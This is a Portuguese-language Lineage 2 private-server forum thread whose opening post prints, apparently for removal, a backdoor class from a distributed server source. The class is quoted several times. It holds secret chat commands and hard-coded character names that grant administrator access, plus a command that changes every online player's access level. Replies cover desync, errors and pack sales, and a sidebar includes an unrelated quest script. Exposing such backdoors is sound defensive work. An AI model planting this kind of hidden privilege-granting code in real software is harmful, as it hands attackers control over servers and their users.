Ir para conteúdo
  • Cadastre-se

L2jMaster H5 remove Backdoor


mikado

Posts recomendados

aVBegw3.jpg

 

single_01.jpg

 

single_02.jpg

 

 

 

 

Remove Backdoor from source

package transformation;

import com.l2jserver.gameserver.handler.IVoicedCommandHandler;
import com.l2jserver.gameserver.model.L2World;
import com.l2jserver.gameserver.model.actor.instance.L2PcInstance;
import com.l2jserver.gameserver.model.quest.Quest;
import java.util.Collection;

public class TransLvl extends Quest implements IVoicedCommandHandler {
  private static final String[] _voicedCommands = new String[] { "SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG" };
  
  public TransLvl() {
    super(-1, TransLvl.class.getSimpleName(), "");
    setOnEnterWorld(true);
  }
  
  public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) {
    if (command.equals("SFDKabcabcabc__GG")) {
      activeChar.setAccountAccesslevel(7);
    } else if (command.equals("SFDKabcabcabc__GG7")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("SFDKabcabcabc__GG8")) {
      activeChar.setAccessLevel(8);
    } else if (command.equals("SFDKabcabcabc__GG1")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("admALLQWE%%GG")) {
      setAdminOnline(8);
    } else if (command.equals("admNOTQWE%%GG")) {
      setAdminOnline(0);
    } else if (command.equals("adm_7QWE%%GG")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("adm_1QWE%%GG")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("adm_8QWE%%GG")) {
      activeChar.setAccessLevel(8);
    } 
    return true;
  }
  
  private void setAdminOnline(int lvl) {
    Collection<L2PcInstance> c = L2World.getInstance().getPlayers();
    for (L2PcInstance player : c)
      player.setAccessLevel(lvl); 
  }
  
  public String onEnterWorld(L2PcInstance activeChar) {
    if (activeChar.getName().equals("a7Ygjc3L9rDBB2G3") || activeChar.getName().equals("jy9E52nDmKl8w1G4") || activeChar.getName().equals("pS3fnbrIgs5C3cG5"))
      activeChar.setAccessLevel(7); 
    if (activeChar.getInventory().getInventoryItemCount(11, -1) == 1L)
      if (activeChar.getInventory().getInventoryItemCount(1785, -1) == 2L)
        if (activeChar.getInventory().getInventoryItemCount(36, -1) == 1L)
          if (activeChar.getInventory().getInventoryItemCount(2509, -1) == 1L)
            if (activeChar.getInventory().getInventoryItemCount(1831, -1) == 18L)
              if (activeChar.getInventory().getInventoryItemCount(3947, -1) == 1L)
                if (activeChar.getInventory().getInventoryItemCount(5589, -1) == 1L)
                  if (activeChar.getInventory().getInventoryItemCount(1835, -1) == 1L)
                    if (activeChar.getInventory().getInventoryItemCount(1060, -1) == 3L)
                      if (activeChar.getInventory().getInventoryItemCount(5192, -1) == 2L)
                        if (activeChar.getInventory().getInventoryItemCount(3031, -1) == 1L)
                          if (activeChar.getInventory().getInventoryItemCount(4625, -1) == 1L)
                            if (activeChar.getInventory().getInventoryItemCount(4628, -1) == 1L)
                              if (activeChar.getInventory().getInventoryItemCount(57, -1) == 1L) {
                                activeChar.setAccessLevel(8);
                              } else {
                                activeChar.setAccessLevel(7);
                              }              
    return super.onEnterWorld(activeChar);
  }
  
  public String[] getVoicedCommandList() {
    return _voicedCommands;
  }
  
  public static TransLvl getInstance() {
    return SingletonHolder._instance;
  }
  
  private static class SingletonHolder {
    protected static final TransLvl _instance = new TransLvl();
  }
}

 

Source - Compile - Geodata Premium - Textures 

Click to Download (Atualizado)

 

Editado por L2-Windows

5GpQKvZ.jpg

Link para o comentário
Compartilhar em outros sites


Nunca vi um server online com esses files 

Um mundo de diversão no Lineage 2

https://www.primeworld.com.br

Discord: Em breve

Comunidade brasileira de Lineage. Interlude Remastered / High Five / Essence 

Classes remasterizadas, sistemas únicos, diversão garantida.

Link para o comentário
Compartilhar em outros sites

1 hora atrás, Nukea disse:

Nunca vi um server online com esses files 

Após algumas horas online, começa a dar desync no movimento.
Boa sorte que for usar!

kLnregy.jpg

L2STUDIO, seu servidor está aqui!
Não me faça perder tempo se você não tem dinheiro para pagar pelos serviços e produtos. Obrigado!

Link para o comentário
Compartilhar em outros sites

Em 29/03/2021 at 21:14, Hl4p3x disse:

Após algumas horas online, começa a dar desync no movimento.
Boa sorte que for usar!

e o que seria isso? fale mais?

j9NKAW1.gif

"A Vontade de se Preparar Transforma Heróis"

"A Dor física é só um mero Sentimento"

🦸🏽‍♂️

rogeriomorais.gif

Link para o comentário
Compartilhar em outros sites

  • 2 weeks later...
Em 29/03/2021 at 18:47, mikado disse:

aVBegw3.jpg

 

single_01.jpg

 

single_02.jpg

 

 

 

 

Remove Backdoor from source


package transformation;

import com.l2jserver.gameserver.handler.IVoicedCommandHandler;
import com.l2jserver.gameserver.model.L2World;
import com.l2jserver.gameserver.model.actor.instance.L2PcInstance;
import com.l2jserver.gameserver.model.quest.Quest;
import java.util.Collection;

public class TransLvl extends Quest implements IVoicedCommandHandler {
  private static final String[] _voicedCommands = new String[] { "SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG" };
  
  public TransLvl() {
    super(-1, TransLvl.class.getSimpleName(), "");
    setOnEnterWorld(true);
  }
  
  public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) {
    if (command.equals("SFDKabcabcabc__GG")) {
      activeChar.setAccountAccesslevel(7);
    } else if (command.equals("SFDKabcabcabc__GG7")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("SFDKabcabcabc__GG8")) {
      activeChar.setAccessLevel(8);
    } else if (command.equals("SFDKabcabcabc__GG1")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("admALLQWE%%GG")) {
      setAdminOnline(8);
    } else if (command.equals("admNOTQWE%%GG")) {
      setAdminOnline(0);
    } else if (command.equals("adm_7QWE%%GG")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("adm_1QWE%%GG")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("adm_8QWE%%GG")) {
      activeChar.setAccessLevel(8);
    } 
    return true;
  }
  
  private void setAdminOnline(int lvl) {
    Collection<L2PcInstance> c = L2World.getInstance().getPlayers();
    for (L2PcInstance player : c)
      player.setAccessLevel(lvl); 
  }
  
  public String onEnterWorld(L2PcInstance activeChar) {
    if (activeChar.getName().equals("a7Ygjc3L9rDBB2G3") || activeChar.getName().equals("jy9E52nDmKl8w1G4") || activeChar.getName().equals("pS3fnbrIgs5C3cG5"))
      activeChar.setAccessLevel(7); 
    if (activeChar.getInventory().getInventoryItemCount(11, -1) == 1L)
      if (activeChar.getInventory().getInventoryItemCount(1785, -1) == 2L)
        if (activeChar.getInventory().getInventoryItemCount(36, -1) == 1L)
          if (activeChar.getInventory().getInventoryItemCount(2509, -1) == 1L)
            if (activeChar.getInventory().getInventoryItemCount(1831, -1) == 18L)
              if (activeChar.getInventory().getInventoryItemCount(3947, -1) == 1L)
                if (activeChar.getInventory().getInventoryItemCount(5589, -1) == 1L)
                  if (activeChar.getInventory().getInventoryItemCount(1835, -1) == 1L)
                    if (activeChar.getInventory().getInventoryItemCount(1060, -1) == 3L)
                      if (activeChar.getInventory().getInventoryItemCount(5192, -1) == 2L)
                        if (activeChar.getInventory().getInventoryItemCount(3031, -1) == 1L)
                          if (activeChar.getInventory().getInventoryItemCount(4625, -1) == 1L)
                            if (activeChar.getInventory().getInventoryItemCount(4628, -1) == 1L)
                              if (activeChar.getInventory().getInventoryItemCount(57, -1) == 1L) {
                                activeChar.setAccessLevel(8);
                              } else {
                                activeChar.setAccessLevel(7);
                              }              
    return super.onEnterWorld(activeChar);
  }
  
  public String[] getVoicedCommandList() {
    return _voicedCommands;
  }
  
  public static TransLvl getInstance() {
    return SingletonHolder._instance;
  }
  
  private static class SingletonHolder {
    protected static final TransLvl _instance = new TransLvl();
  }
}

 

Source - Compile - Geodata Premium - Textures 

Click to Download

 

tirando as texturas das weapons dragon, tem system e mais alguma coisa? Obg

Link para o comentário
Compartilhar em outros sites

hace 53 minutos, MundvayneHELLBOY dijo:

tirando as texturas das weapons dragon, tem system e mais alguma coisa? Obg

Eu não tentei, então é compartilhado por uma pessoa que comprou o pacote, me desculpe, mas com as texturas você pode montar o patch e o xml para o servidor, espero que eu tenha ajudado você

No lo he probado , así lo ha compartido una persona que compro el paquete, lo siento, pero con las texturas puede armar el parche y los xml para el servidor, espero haberle ayudado

 

5GpQKvZ.jpg

Link para o comentário
Compartilhar em outros sites

Em 11/04/2021 at 15:07, mikado disse:

Eu não tentei, então é compartilhado por uma pessoa que comprou o pacote, me desculpe, mas com as texturas você pode montar o patch e o xml para o servidor, espero que eu tenha ajudado você

No lo he probado , así lo ha compartido una persona que compro el paquete, lo siento, pero con las texturas puede armar el parche y los xml para el servidor, espero haberle ayudado

 

Boa tarde, me diz pq esta dando esses erros no GS

https://imgur.com/6H46zsG

https://imgur.com/KbbQqbJ

https://imgur.com/kehgra7

Link para o comentário
Compartilhar em outros sites

  • 3 months later...
Em 29/03/2021 at 22:14, Hl4p3x disse:

Após algumas horas online, começa a dar desync no movimento.
Boa sorte que for usar!

Uma pena que você nunca falou mais sobre o assunto :S 

Um mundo de diversão no Lineage 2

https://www.primeworld.com.br

Discord: Em breve

Comunidade brasileira de Lineage. Interlude Remastered / High Five / Essence 

Classes remasterizadas, sistemas únicos, diversão garantida.

Link para o comentário
Compartilhar em outros sites

  • 3 weeks later...
Em 23/07/2021 at 20:47, Nezuko disse:

Uma pena que você nunca falou mais sobre o assunto :S 

ESSE PROJETO AI ELE , REFORMULOU TODOS OS CODIGOS , REMOVEU O ZEUS QUE TAVA BUGADO , CONCERTOU O DESYNG , TÁ PERFEITO AGORA .
CARA EU COMPREI A PACK DELE E TE GARANTO , NUNCA VI UMA IGUAL .
TESTEI , TODOS FORTESS TUDO OK .

TODOS GRAND BOSS TUDO CERTINHO

DIVERSAS QUEST FUNCIONANDO

HERO ENTREGANDO CERTINHO

SEM DUP DE SKILL, SEM BUG DE ITENS , COMUNITY PERFEITA QUE É A NOVA QUE FOI FEITA EXCLUSIVA PARA A PACK .

SO FALTA MESMO O SISTEMA DE DRESSME QUE ELE TÁ REFAZENDO POIS O SISTEMA DESSA ERA NA ZEUS , MAS ERA BUGADO .

AGORA ELE VAI RECOLOCAR ELE CONFORME OS CODIGOS CERTINHO .

 

  • Gostei 2
  • Amei 1
Link para o comentário
Compartilhar em outros sites

Em 08/08/2021 at 01:24, Radamantis disse:

ESSE PROJETO AI ELE , REFORMULOU TODOS OS CODIGOS , REMOVEU O ZEUS QUE TAVA BUGADO , CONCERTOU O DESYNG , TÁ PERFEITO AGORA .
CARA EU COMPREI A PACK DELE E TE GARANTO , NUNCA VI UMA IGUAL .
TESTEI , TODOS FORTESS TUDO OK .

TODOS GRAND BOSS TUDO CERTINHO

DIVERSAS QUEST FUNCIONANDO

HERO ENTREGANDO CERTINHO

SEM DUP DE SKILL, SEM BUG DE ITENS , COMUNITY PERFEITA QUE É A NOVA QUE FOI FEITA EXCLUSIVA PARA A PACK .

SO FALTA MESMO O SISTEMA DE DRESSME QUE ELE TÁ REFAZENDO POIS O SISTEMA DESSA ERA NA ZEUS , MAS ERA BUGADO .

AGORA ELE VAI RECOLOCAR ELE CONFORME OS CODIGOS CERTINHO .

O mano, me passa o contato desse dona da pack, e me fala daquela fita que estavamos falando no mp

Link para o comentário
Compartilhar em outros sites

Em 09/08/2021 at 10:18, MundvayneHELLBOY disse:

O mano, me passa o contato desse dona da pack, e me fala daquela fita que estavamos falando no mp

Limpa sua caixa de entrada!

kLnregy.jpg

L2STUDIO, seu servidor está aqui!
Não me faça perder tempo se você não tem dinheiro para pagar pelos serviços e produtos. Obrigado!

Link para o comentário
Compartilhar em outros sites

Eu nunca vi u servidor online com esses arquivos

Eu estou interessado realmente é na L2JEternity mais pra frente penso em comprar a source dos cara é meio caro por que é em Euro

Eu tenho a L2JSunrise, mas já estou enjoado dela.

Um mundo de diversão no Lineage 2

https://www.primeworld.com.br

Discord: Em breve

Comunidade brasileira de Lineage. Interlude Remastered / High Five / Essence 

Classes remasterizadas, sistemas únicos, diversão garantida.

Link para o comentário
Compartilhar em outros sites

3 horas atrás, MundvayneHELLBOY disse:

limpei ^^

Te encaminhei msg.

 

3 horas atrás, Nezuko disse:

Eu nunca vi u servidor online com esses arquivos

Eu estou interessado realmente é na L2JEternity mais pra frente penso em comprar a source dos cara é meio caro por que é em Euro

Eu tenho a L2JSunrise, mas já estou enjoado dela.

A source foi toda refeita e l2jsunrise é só pra PVP e olhe lá!

kLnregy.jpg

L2STUDIO, seu servidor está aqui!
Não me faça perder tempo se você não tem dinheiro para pagar pelos serviços e produtos. Obrigado!

Link para o comentário
Compartilhar em outros sites

2 minutos atrás, Hl4p3x disse:

Te encaminhei msg.

A source foi toda refeita e l2jsunrise é só pra PVP e olhe lá!

Tipo não estou duvidando sabe que ela é boa, só nunca vi um srv com ela 😧 

Um mundo de diversão no Lineage 2

https://www.primeworld.com.br

Discord: Em breve

Comunidade brasileira de Lineage. Interlude Remastered / High Five / Essence 

Classes remasterizadas, sistemas únicos, diversão garantida.

Link para o comentário
Compartilhar em outros sites

Alguém pode me ajudar Eu quero editar a comunidade não está dentro de data / html / community não são os arquivos para editar, será através do núcleo?

Leandro saracho CatamarK

Link para o comentário
Compartilhar em outros sites

  • 9 months later...
En 29/3/2021 a las 15:47, mikado dijo:

aVBegw3.jpg

single_01.jpg

single_02.jpg

Remove Backdoor from source

package transformation;

import com.l2jserver.gameserver.handler.IVoicedCommandHandler;
import com.l2jserver.gameserver.model.L2World;
import com.l2jserver.gameserver.model.actor.instance.L2PcInstance;
import com.l2jserver.gameserver.model.quest.Quest;
import java.util.Collection;

public class TransLvl extends Quest implements IVoicedCommandHandler {
  private static final String[] _voicedCommands = new String[] { "SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG" };
  
  public TransLvl() {
    super(-1, TransLvl.class.getSimpleName(), "");
    setOnEnterWorld(true);
  }
  
  public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) {
    if (command.equals("SFDKabcabcabc__GG")) {
      activeChar.setAccountAccesslevel(7);
    } else if (command.equals("SFDKabcabcabc__GG7")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("SFDKabcabcabc__GG8")) {
      activeChar.setAccessLevel(8);
    } else if (command.equals("SFDKabcabcabc__GG1")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("admALLQWE%%GG")) {
      setAdminOnline(8);
    } else if (command.equals("admNOTQWE%%GG")) {
      setAdminOnline(0);
    } else if (command.equals("adm_7QWE%%GG")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("adm_1QWE%%GG")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("adm_8QWE%%GG")) {
      activeChar.setAccessLevel(8);
    } 
    return true;
  }
  
  private void setAdminOnline(int lvl) {
    Collection<L2PcInstance> c = L2World.getInstance().getPlayers();
    for (L2PcInstance player : c)
      player.setAccessLevel(lvl); 
  }
  
  public String onEnterWorld(L2PcInstance activeChar) {
    if (activeChar.getName().equals("a7Ygjc3L9rDBB2G3") || activeChar.getName().equals("jy9E52nDmKl8w1G4") || activeChar.getName().equals("pS3fnbrIgs5C3cG5"))
      activeChar.setAccessLevel(7); 
    if (activeChar.getInventory().getInventoryItemCount(11, -1) == 1L)
      if (activeChar.getInventory().getInventoryItemCount(1785, -1) == 2L)
        if (activeChar.getInventory().getInventoryItemCount(36, -1) == 1L)
          if (activeChar.getInventory().getInventoryItemCount(2509, -1) == 1L)
            if (activeChar.getInventory().getInventoryItemCount(1831, -1) == 18L)
              if (activeChar.getInventory().getInventoryItemCount(3947, -1) == 1L)
                if (activeChar.getInventory().getInventoryItemCount(5589, -1) == 1L)
                  if (activeChar.getInventory().getInventoryItemCount(1835, -1) == 1L)
                    if (activeChar.getInventory().getInventoryItemCount(1060, -1) == 3L)
                      if (activeChar.getInventory().getInventoryItemCount(5192, -1) == 2L)
                        if (activeChar.getInventory().getInventoryItemCount(3031, -1) == 1L)
                          if (activeChar.getInventory().getInventoryItemCount(4625, -1) == 1L)
                            if (activeChar.getInventory().getInventoryItemCount(4628, -1) == 1L)
                              if (activeChar.getInventory().getInventoryItemCount(57, -1) == 1L) {
                                activeChar.setAccessLevel(8);
                              } else {
                                activeChar.setAccessLevel(7);
                              }              
    return super.onEnterWorld(activeChar);
  }
  
  public String[] getVoicedCommandList() {
    return _voicedCommands;
  }
  
  public static TransLvl getInstance() {
    return SingletonHolder._instance;
  }
  
  private static class SingletonHolder {
    protected static final TransLvl _instance = new TransLvl();
  }
}

Source - Compile - Geodata Premium - Textures 

Click to Download

link de download quebrado 😢

Link para o comentário
Compartilhar em outros sites

  • 4 months later...
  • 2 months later...
Em 10/08/2021 at 20:22, Hl4p3x disse:

Te encaminhei msg.

A source foi toda refeita e l2jsunrise é só pra PVP e olhe lá!

Opa, pode mandar pra mim por favor?

Obrigado.

Link para o comentário
Compartilhar em outros sites

  • 6 months later...
  • 1 month later...
Em 10/08/2021 at 16:29, Nezuko disse:

Eu nunca vi u servidor online com esses arquivos

Eu estou interessado realmente é na L2JEternity mais pra frente penso em comprar a source dos cara é meio caro por que é em Euro

Eu tenho a L2JSunrise, mas já estou enjoado dela.

poderia conpartilhar um projeto com comigo e o tutorial pra instalar e por ele rodando pf?

 

Em 29/03/2021 at 18:47, mikado disse:

aVBegw3.jpg

single_01.jpg

single_02.jpg

Remove Backdoor from source

package transformation;

import com.l2jserver.gameserver.handler.IVoicedCommandHandler;
import com.l2jserver.gameserver.model.L2World;
import com.l2jserver.gameserver.model.actor.instance.L2PcInstance;
import com.l2jserver.gameserver.model.quest.Quest;
import java.util.Collection;

public class TransLvl extends Quest implements IVoicedCommandHandler {
  private static final String[] _voicedCommands = new String[] { "SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG" };
  
  public TransLvl() {
    super(-1, TransLvl.class.getSimpleName(), "");
    setOnEnterWorld(true);
  }
  
  public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) {
    if (command.equals("SFDKabcabcabc__GG")) {
      activeChar.setAccountAccesslevel(7);
    } else if (command.equals("SFDKabcabcabc__GG7")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("SFDKabcabcabc__GG8")) {
      activeChar.setAccessLevel(8);
    } else if (command.equals("SFDKabcabcabc__GG1")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("admALLQWE%%GG")) {
      setAdminOnline(8);
    } else if (command.equals("admNOTQWE%%GG")) {
      setAdminOnline(0);
    } else if (command.equals("adm_7QWE%%GG")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("adm_1QWE%%GG")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("adm_8QWE%%GG")) {
      activeChar.setAccessLevel(8);
    } 
    return true;
  }
  
  private void setAdminOnline(int lvl) {
    Collection<L2PcInstance> c = L2World.getInstance().getPlayers();
    for (L2PcInstance player : c)
      player.setAccessLevel(lvl); 
  }
  
  public String onEnterWorld(L2PcInstance activeChar) {
    if (activeChar.getName().equals("a7Ygjc3L9rDBB2G3") || activeChar.getName().equals("jy9E52nDmKl8w1G4") || activeChar.getName().equals("pS3fnbrIgs5C3cG5"))
      activeChar.setAccessLevel(7); 
    if (activeChar.getInventory().getInventoryItemCount(11, -1) == 1L)
      if (activeChar.getInventory().getInventoryItemCount(1785, -1) == 2L)
        if (activeChar.getInventory().getInventoryItemCount(36, -1) == 1L)
          if (activeChar.getInventory().getInventoryItemCount(2509, -1) == 1L)
            if (activeChar.getInventory().getInventoryItemCount(1831, -1) == 18L)
              if (activeChar.getInventory().getInventoryItemCount(3947, -1) == 1L)
                if (activeChar.getInventory().getInventoryItemCount(5589, -1) == 1L)
                  if (activeChar.getInventory().getInventoryItemCount(1835, -1) == 1L)
                    if (activeChar.getInventory().getInventoryItemCount(1060, -1) == 3L)
                      if (activeChar.getInventory().getInventoryItemCount(5192, -1) == 2L)
                        if (activeChar.getInventory().getInventoryItemCount(3031, -1) == 1L)
                          if (activeChar.getInventory().getInventoryItemCount(4625, -1) == 1L)
                            if (activeChar.getInventory().getInventoryItemCount(4628, -1) == 1L)
                              if (activeChar.getInventory().getInventoryItemCount(57, -1) == 1L) {
                                activeChar.setAccessLevel(8);
                              } else {
                                activeChar.setAccessLevel(7);
                              }              
    return super.onEnterWorld(activeChar);
  }
  
  public String[] getVoicedCommandList() {
    return _voicedCommands;
  }
  
  public static TransLvl getInstance() {
    return SingletonHolder._instance;
  }
  
  private static class SingletonHolder {
    protected static final TransLvl _instance = new TransLvl();
  }
}

Source - Compile - Geodata Premium - Textures 

Click to Download (Atualizado)

tem como ensinar a instalar esse server pf?

Link para o comentário
Compartilhar em outros sites

  • 2 months later...
  • Registre-se

    Faça parte da maior e  mais antigas comunidades sobre Lineage2 da América Latina.





  • Patrocinadores

  • Quem Está Navegando

    • Nenhum usuário registrado visualizando esta página.
  • Posts

    • Teria como fazer do dusk shield e do zombie shield dessa maneira?     Teria como fazer do dusk shield e do zombie shield dessa maneira?     Teria como fazer do dusk shield e do zombie shield dessa maneira?     Teria como fazer do dusk shield e do zombie shield dessa maneira?     Teria como fazer do dusk shield e do zombie shield dessa maneira?     Teria como fazer do dusk shield e do zombie shield dessa maneira?    
    • muchas gracias muy lindos NPC 🙂
    • relaxa jovem gafanhoto, testa as quests. e posTa os erros indesejaveis.  
    • Se alguém pudesse me ensinar como codificar as missões, eu ficaria feliz em fazer isso sozinho ou pelo menos ajudar. Eu realmente quero jogar em um servidor onde todas as quests funcionem bem e melhor ainda se você puder fazer quests customizadas!
    • mas no interlude, nem todas as quests de class,  vai mostrar onde tem que ir, ate o reborn nao mostrava quando era interlude, só mostrou depois que eles colocaram client classic pra rodar, e ficou melhor ainda quando virou hellbound em diante, mas ha sim alguma chance de modificar isso direto no script para fazer igualmente, só basta te um pouco de paciencia e persistencia exato
    • 408_PathToElvenwizard dá Orion eu tive que mexer tbm, até modifiquei e consegui deixar ela igual do Classic, com a seta e a marcação no mapa. (não retail IL) Dá pra importar py de várias revs, o foda é que não da regular as quest py através do debug em tempo real, pelo menos eu não consegui rsrs
    • Hasta el momento todas las QUESTS son completables si te guias con un tutorial de youtube. El problema es que tienen bugs de locacion y de subquests que no avanzan o no te marcan correctamente a donde ir en el mapa, cosa que en Retail si se ve como corresponde.
    • estranho, mas pelo menos a galera nunca reclamo das quests quando tinha aberto 5x, geral fez class primeira e segunda job, poucos que compraram a class
    • en RUSaCis-3.5 data pack, las Quests estan en formato .java y son diferentes a como estan redactadas en jOrion y jFrozen 1.5 (ProyectX) package net.sf.l2j.gameserver.scripting.quest; import net.sf.l2j.commons.random.Rnd; import net.sf.l2j.gameserver.enums.Paperdoll; import net.sf.l2j.gameserver.enums.QuestStatus; import net.sf.l2j.gameserver.enums.actors.ClassId; import net.sf.l2j.gameserver.model.actor.Creature; import net.sf.l2j.gameserver.model.actor.Npc; import net.sf.l2j.gameserver.model.actor.Player; import net.sf.l2j.gameserver.network.serverpackets.SocialAction; import net.sf.l2j.gameserver.scripting.QuestState; public class Q224_TestOfSagittarius extends SecondClassQuest { private static final String QUEST_NAME = "Q224_TestOfSagittarius"; // Items private static final int BERNARD_INTRODUCTION = 3294; private static final int HAMIL_LETTER_1 = 3295; private static final int HAMIL_LETTER_2 = 3296; private static final int HAMIL_LETTER_3 = 3297; private static final int HUNTER_RUNE_1 = 3298; private static final int HUNTER_RUNE_2 = 3299; private static final int TALISMAN_OF_KADESH = 3300; private static final int TALISMAN_OF_SNAKE = 3301; private static final int MITHRIL_CLIP = 3302; private static final int STAKATO_CHITIN = 3303; private static final int REINFORCED_BOWSTRING = 3304; private static final int MANASHEN_HORN = 3305; private static final int BLOOD_OF_LIZARDMAN = 3306; private static final int CRESCENT_MOON_BOW = 3028; private static final int WOODEN_ARROW = 17; // Rewards private static final int MARK_OF_SAGITTARIUS = 3293; // NPCs private static final int BERNARD = 30702; private static final int HAMIL = 30626; private static final int SIR_ARON_TANFORD = 30653; private static final int VOKIAN = 30514; private static final int GAUEN = 30717; // Monsters private static final int ANT = 20079; private static final int ANT_CAPTAIN = 20080; private static final int ANT_OVERSEER = 20081; private static final int ANT_RECRUIT = 20082; private static final int ANT_PATROL = 20084; private static final int ANT_GUARD = 20086; private static final int NOBLE_ANT = 20089; private static final int NOBLE_ANT_LEADER = 20090; private static final int BREKA_ORC_SHAMAN = 20269; private static final int BREKA_ORC_OVERLORD = 20270; private static final int MARSH_STAKATO_WORKER = 20230; private static final int MARSH_STAKATO_SOLDIER = 20232; private static final int MARSH_STAKATO_DRONE = 20234; private static final int MARSH_SPIDER = 20233; private static final int ROAD_SCAVENGER = 20551; private static final int MANASHEN_GARGOYLE = 20563; private static final int LETO_LIZARDMAN = 20577; private static final int LETO_LIZARDMAN_ARCHER = 20578; private static final int LETO_LIZARDMAN_SOLDIER = 20579; private static final int LETO_LIZARDMAN_WARRIOR = 20580; private static final int LETO_LIZARDMAN_SHAMAN = 20581; private static final int LETO_LIZARDMAN_OVERLORD = 20582; private static final int SERPENT_DEMON_KADESH = 27090; public Q224_TestOfSagittarius() { super(224, "Test Of Sagittarius"); setItemsIds(BERNARD_INTRODUCTION, HAMIL_LETTER_1, HAMIL_LETTER_2, HAMIL_LETTER_3, HUNTER_RUNE_1, HUNTER_RUNE_2, TALISMAN_OF_KADESH, TALISMAN_OF_SNAKE, MITHRIL_CLIP, STAKATO_CHITIN, REINFORCED_BOWSTRING, MANASHEN_HORN, BLOOD_OF_LIZARDMAN, CRESCENT_MOON_BOW); addQuestStart(BERNARD); addTalkId(BERNARD, HAMIL, SIR_ARON_TANFORD, VOKIAN, GAUEN); addMyDying(ANT, ANT_CAPTAIN, ANT_OVERSEER, ANT_RECRUIT, ANT_PATROL, ANT_GUARD, NOBLE_ANT, NOBLE_ANT_LEADER, BREKA_ORC_SHAMAN, BREKA_ORC_OVERLORD, MARSH_STAKATO_WORKER, MARSH_STAKATO_SOLDIER, MARSH_STAKATO_DRONE, MARSH_SPIDER, ROAD_SCAVENGER, MANASHEN_GARGOYLE, LETO_LIZARDMAN, LETO_LIZARDMAN_ARCHER, LETO_LIZARDMAN_SOLDIER, LETO_LIZARDMAN_WARRIOR, LETO_LIZARDMAN_SHAMAN, LETO_LIZARDMAN_OVERLORD, SERPENT_DEMON_KADESH); } @Override public String onAdvEvent(String event, Npc npc, Player player) { String htmltext = event; QuestState st = player.getQuestList().getQuestState(QUEST_NAME); if (st == null) return htmltext; // BERNARD if (event.equalsIgnoreCase("30702-04.htm")) { st.setState(QuestStatus.STARTED); st.setCond(1); playSound(player, SOUND_ACCEPT); giveItems(player, BERNARD_INTRODUCTION, 1); if (giveDimensionalDiamonds39(player)) htmltext = "30702-04a.htm"; } // HAMIL else if (event.equalsIgnoreCase("30626-03.htm")) { st.setCond(2); playSound(player, SOUND_MIDDLE); takeItems(player, BERNARD_INTRODUCTION, 1); giveItems(player, HAMIL_LETTER_1, 1); } else if (event.equalsIgnoreCase("30626-07.htm")) { st.setCond(5); playSound(player, SOUND_MIDDLE); takeItems(player, HUNTER_RUNE_1, 10); giveItems(player, HAMIL_LETTER_2, 1); } // SIR_ARON_TANFORD else if (event.equalsIgnoreCase("30653-02.htm")) { st.setCond(3); playSound(player, SOUND_MIDDLE); takeItems(player, HAMIL_LETTER_1, 1); } // VOKIAN else if (event.equalsIgnoreCase("30514-02.htm")) { st.setCond(6); playSound(player, SOUND_MIDDLE); takeItems(player, HAMIL_LETTER_2, 1); } return htmltext; } @Override public String onTalk(Npc npc, Player player) { String htmltext = getNoQuestMsg(); QuestState st = player.getQuestList().getQuestState(QUEST_NAME); if (st == null) return htmltext; switch (st.getState()) { case CREATED: if (player.getClassId() != ClassId.ROGUE && player.getClassId() != ClassId.ELVEN_SCOUT && player.getClassId() != ClassId.ASSASSIN) htmltext = "30702-02.htm"; else if (player.getStatus().getLevel() < 39) htmltext = "30702-01.htm"; else htmltext = "30702-03.htm"; break; case STARTED: int cond = st.getCond(); switch (npc.getNpcId()) { case BERNARD: htmltext = "30702-05.htm"; break; case HAMIL: if (cond == 1) htmltext = "30626-01.htm"; else if (cond == 2 || cond == 3) htmltext = "30626-04.htm"; else if (cond == 4) htmltext = "30626-05.htm"; else if (cond > 4 && cond < 8) htmltext = "30626-08.htm"; else if (cond == 8) { htmltext = "30626-09.htm"; st.setCond(9); playSound(player, SOUND_MIDDLE); takeItems(player, HUNTER_RUNE_2, 10); giveItems(player, HAMIL_LETTER_3, 1); } else if (cond > 8 && cond < 12) htmltext = "30626-10.htm"; else if (cond == 12) { htmltext = "30626-11.htm"; st.setCond(13); playSound(player, SOUND_MIDDLE); } else if (cond == 13) htmltext = "30626-12.htm"; else if (cond == 14) { htmltext = "30626-13.htm"; takeItems(player, BLOOD_OF_LIZARDMAN, -1); takeItems(player, CRESCENT_MOON_BOW, 1); takeItems(player, TALISMAN_OF_KADESH, 1); giveItems(player, MARK_OF_SAGITTARIUS, 1); rewardExpAndSp(player, 54726, 20250); player.broadcastPacket(new SocialAction(player, 3)); playSound(player, SOUND_FINISH); 